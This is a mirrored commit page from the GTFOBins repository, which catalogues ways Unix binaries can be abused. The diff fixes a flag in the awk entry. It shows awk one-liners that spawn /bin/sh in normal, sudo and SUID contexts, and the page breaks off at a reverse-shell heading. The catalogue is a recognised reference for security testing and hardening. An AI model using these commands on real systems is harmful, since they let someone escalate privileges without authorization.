mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Remove the -p option from sudo-enabled (typo)
This commit is contained in:
@@ -3,7 +3,7 @@ functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
reverse-shell-non-interactive:
|
||||
|
Reference in New Issue
Block a user